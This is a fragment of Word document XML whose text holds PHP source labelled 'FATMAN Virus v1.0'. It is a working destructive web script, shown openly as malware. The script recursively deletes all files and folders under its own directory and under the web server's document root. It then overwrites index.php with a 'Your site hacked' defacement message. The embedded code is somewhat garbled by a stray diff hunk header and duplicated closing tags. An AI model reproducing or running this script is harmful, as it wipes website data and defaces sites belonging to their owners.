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A1D" w:rsidRDefault="00E30CEC"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&lt;?php /* FATMAN Virus v1.0 DVELOPED BY: REZWAN AHMOD SAMI. */ $cur_dir = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Historic" w:hAnsi="Segoe UI Historic" w:cs="Segoe UI Historic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="050505"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E4E6EB"/>
        </w:rPr>
        <w:t>_DIR_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; $root = $_SERVER['DOCUMENT_ROOT']; function clear_all($src, $root_dir = ''){ $dir= opendir($src); while (false !== ($file = readdir($dir))) { if (($file != '.') &amp;&amp; ($file != '..')) { $full = $src.'/'.$file; if (is_dir($full)) { clear_all($full); }else{ // if ($file != 'fatman.php') { unlink($full); // } } } } closedir($dir); if ($src != $root_dir) { rmdir($src); } return 1; } // you need to pass root dir here if (clear_all($cur_dir, $cur_dir)) { if (clear_all($root, $root)) { $deface_page = 'Your site hacked by 00000'; $f = fopen($cur_dir.'index.php', 'w'); $f = fopen($root.'index.php', 'w'); $write= fwrite($f, $deface_page); if ($write) { echo 'Operations success!!'; @@ -45,4 +45,4 @@ function clear_all($src, $root_dir = ''){ }else{ echo 'Failed to operation'; } ?&gt; ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D82A1D" w:rsidSect="00D82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0CEC"/>
    <w:rsid w:val="00D82A1D"/>
    <w:rsid w:val="00E30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2021-11-26T04:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-26T04:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>